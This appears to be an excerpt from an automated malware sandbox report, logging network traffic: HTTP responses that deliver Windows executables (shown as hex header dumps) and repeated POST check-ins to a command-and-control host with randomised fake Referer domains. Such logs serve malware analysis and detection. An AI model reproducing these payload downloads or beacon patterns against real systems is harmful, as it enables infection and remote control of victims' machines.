3b e2 02 c0 39 e3 c8 a3 3b e2 52 69 63 68 c9 a3 3b e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 c4 5f eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 7a 01 00 00 86 00 00 00 00 00 00 e0 82 01 00 00 10 00 00 00 90 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 02 00 00 04 00 00 16 33 02 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 c0 01 00 74 1e 00 00 b4 de 01 00 2c 01 00 00 00 20 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fa 01 00 d0 1d 00 00 00 30 02 00 68 0c 00 00 00 b9 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 b9 01 00 18 00 00 00 68 b8 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 f4 02 00 00 6c be 01 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ca 78 01 00 00 10 00 00 00 7a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5e 65 00 00 00 90 01 00 00 66 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc 0b 00 00 00 00 02 00 00 02 00 00 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 38 00 00 00 00 10 02 00 00 02 00 00 00 e6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 20 02 00 00 04 00 00 00 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0c 00 00 00 30 02 00 00 0e 00 00 00 ec 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 11 Jan 2022 19:45:00 GMTContent-Type: application/x-msdos-programContent-Length: 440120Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "6b738-57aa1f0b0df80"Expires: Wed, 12 Jan 2022 19:45:00 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a6 c8 bc 41 e2 a9 d2 12 e2 a9 d2 12 e2 a9 d2 12 56 35 3d 12 e0 a9 d2 12 eb d1 41 12 fa a9 d2 12 3b cb d3 13 e1 a9 d2 12 e2 a9 d3 12 22 a9 d2 12 3b cb d1 13 eb a9 d2 12 3b cb d6 13 ee a9 d2 12 3b cb d7 13 f4 a9 d2 12 3b cb da 13 95 a9 d2 12 3b cb d2 13 e3 a9 d2 12 3b cb 2d 12 e3 a9 d2 12 3b cb d0 13 e3 a9 d2 12 52 69 63 68 e2 a9 d2 12 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 16 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 04 06 00 00 82 00 00 00 00 00 00 50 b1 03 00 00 10 00 00 00 20 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 d0 06 00 00 04 00 00 61 7a 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 43 04 00 82 cf 01 00 f4 52 06 00 2c 01 00 00 00 80 06 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 78 06 00 38 3f 00 00 00 90 06 00 34 3a 00 00 f0 66 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 28 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 50 06 00 f0 02 00 00 98 40 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 03 06 00 00 10 00 00 00 04 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 10 28 00 00 00 20 06 00 00 18 00 00 00 08 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 36 14 00 00 00 50 06 00 00 16 00 00 00 20 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 70 06 00 00 02 00 00 00 36 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 03 00 00 00 80 06 00 00 04 00 00 00 38 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 3a 00 00 00 90 06 00 00 3c 00 00 00 3c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Tue, 11 Jan 2022 19:45:02 GMTContent-Type: application/octet-streamContent-Length: 357376Last-Modified: Tue, 11 Jan 2022 17:13:47 GMTConnection: keep-aliveETag: "61ddbacb-57400"Expires: Tue, 18 Jan 2022 19:45:02 GMTCache-Control: max-age=604800Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 fd 75 73 5a 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 02 32 00 12 01 00 00 5e 04 00 00 00 00 00 00 10 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 b0 05 00 00 04 00 00 00 00 00 00 03 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c 71 01 00 c8 00 00 00 00 90 01 00 50 16 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 74 01 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 63 6f 64 65 00 00 00 7e 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 74 65 78 74 00 00 00 42 d6 00 00 00 50 00 00 00 d8 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a8 33 00 00 00 30 01 00 00 34 00 00 00 16 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 8c 17 00 00 00 70 01 00 00 12 00 00 00 4a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 16 04 00 00 90 01 00 00 18 04 00 00 5c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 11 Jan 2022 19:45:02 GMTContent-Type: application/x-msdos-programContent-Length: 1246160Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "1303d0-57aa1f0b0df80"Expires: Wed, 12 Jan 2022 19:45:02 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 23 83 34 8c 67 e2 5a df 67 e2 5a df 67 e2 5a df 6e 9a c9 df 73 e2 5a df be 80 5b de 65 e2 5a df f9 42 9d df 63 e2 5a df be 80 59 de 6a e2 5a df be 80 5f de 6d e2 5a df be 80 5e de 6c e2 5a df 45 82 5b de 6f e2 5a df ac 81 5b de 64 e2 5a df 67 e2 5b df 90 e2 5a df ac 81 5e de 6d e3 5a df ac 81 5a de 66 e2 5a df ac 81 a5 df 66 e2 5a df ac 81 58 de 66 e2 5a df 52 69 63 68 67 e2 5a df 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ad 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 0e 00 00 1e 04 00 00 00 00 00 77 f0 0e 00 00 10 00 00 00 00 0f 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 13 00 00 04 00 00 b7 bb 13 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 9d 11 00 88 a0 00 00 88 3d 12 00 54 01 00 00 00 b0 12 00 70 03 00 00 00 00 00 00 00 00 00 00 00 e6 12 00 d0 1d 00 00 00 c0 12 00 14 7d 00 00 70 97 11 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 97 11 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 81 e8 0e 00 00 10 00 00 00 ea 0e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 10 52 03 00 00 00 0f 00 00 54 03 00 00 ee 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 47 00 00 00 60 12 00 00 22 00 00 00 42 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 70 03 00 00 00 b0 12 00 00 04 00 00 00 64 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 14 7d 00 00 00 c0 12 00 00 7e 00 00 00 68 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Tue, 11 Jan 2022 19:45:16 GMTContent-Type: application/octet-streamContent-Length: 287744Last-Modified: Tue, 11 Jan 2022 17:06:17 GMTConnection: keep-aliveETag: "61ddb909-46400"Expires: Tue, 18 Jan 2022 19:45:16 GMTCache-Control: max-age=604800Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 86 9c be ec c2 fd d0 bf c2 fd d0 bf c2 fd d0 bf 11 8f d3 be cf fd d0 bf 11 8f d5 be 65 fd d0 bf 11 8f d4 be d4 fd d0 bf 90 88 d4 be d3 fd d0 bf 90 88 d3 be d6 fd d0 bf 90 88 d5 be 89 fd d0 bf 11 8f d1 be c7 fd d0 bf c2 fd d1 bf a3 fd d0 bf 77 88 d5 be c3 fd d0 bf 77 88 2f bf c3 fd d0 bf 77 88 d2 be c3 fd d0 bf 52 69 63 68 c2 fd d0 bf 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7b 9d dd 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 b8 01 00 00 b6 02 00 00 00 00 00 0f 53 00 00 00 10 00 00 00 d0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 04 00 00 04 00 00 10 90 04 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 1c 9d 02 00 3c 00 00 00 00 70 04 00 c9 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 04 00 68 1a 00 00 bc 7f 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 7f 02 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 01 00 5c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 6c b6 01 00 00 10 00 00 00 b8 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ea d4 00 00 00 d0 01 00 00 d6 00 00 00 bc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 58 bc 01 00 00 b0 02 00 00 b0 01 00 00 92 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c9 05 00 00 00 70 04 00 00 06 00 00 00 42 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 1a 00 00 00 80 04 00 00 1c 00 00 00 48 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Tue, 11 Jan 2022 19:45:21 GMTContent-Type: application/octet-streamContent-Length: 535232Last-Modified: Tue, 11 Jan 2022 17:06:31 GMTConnection: keep-aliveETag: "61ddb917-82ac0"Expires: Tue, 18 Jan 2022 19:45:21 GMTCache-Control: max-age=604800Accept-Ranges: bytesData Raw: 4d 5a e2 15 17 e8 ec 6f ac 01 a3 67 88 27 b0 3a 07 28 33 98 08 dd 33 32 a2 e3 d0 db df 66 f6 e9 c8 9b f0 ce 43 27 42 7b 62 19 d6 e4 19 09 05 f6 16 cd 2b 9a c3 52 c6 c7 98 88 64 3a 00 01 00 00 0b 51 d1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 73 0f cc 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 3a 00 00 00 0a 04 00 00 00 00 00 00 a0 04 00 00 20 00 00 00 60 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 06 00 00 04 00 00 be bf 08 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e4 01 00 00 00 90 00 00 ac 08 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 6c 73 00 00 00 00 00 70 00 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 2e 43 52 54 00 00 00 00 00 10 00 00 00 80 00 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 ac 08 04 00 00 90 00 00 ac 08 04 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 00 80 01 00 00 a0 04 00 11 7d 01 00 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Tue, 11 Jan 2022 19:45:34 GMTContent-Type: application/octet-streamContent-Length: 2416280Last-Modified: Tue, 11 Jan 2022 17:06:42 GMTConnection: keep-aliveETag: "61ddb922-24de98"Expires: Tue, 18 Jan 2022 19:45:34 GMTCache-Control: max-age=604800Accept-Ranges: bytesData Raw: 4d 5a e2 15 17 e8 ec 6f ac 01 a3 67 88 27 b0 3a 07 28 33 98 08 dd 33 32 a2 e3 d0 db df 66 f6 e9 c8 9b f0 ce 43 27 42 7b 62 19 d6 e4 19 09 05 f6 16 cd 2b 9a c3 52 c6 c7 98 88 64 3a 00 01 00 00 0b 51 d1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 ca 5e 3d 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 64 3f 00 00 6e 04 00 00 00 00 00 00 30 44 00 00 20 00 00 00 a0 3f 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 45 00 00 04 00 00 86 bb 25 00 02 00 60 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 b0 3f 00 d4 01 00 00 00 c0 3f 00 a0 6c 04 00 00 00 00 00 00 00 00 00 d0 c5 24 00 c8 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 65 64 61 74 61 00 00 00 a0 3f 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 2e 62 73 73 00 00 00 00 00 10 00 00 00 b0 3f 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 a0 6c 04 00 00 c0 3f 00 09 6b 03 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 63 74 6f 72 73 00 00 00 80 01 00 00 30 44 00 0b 7d 01 00 00 72 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pggcfgsws.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 207Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gmfjy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 204Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vvrpud.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 118Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://plegf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 192Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yntwh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 293Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jdeywcw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 323Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yxsry.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 124Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ewylxqujhk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 119Host: host-data-coin-11.com
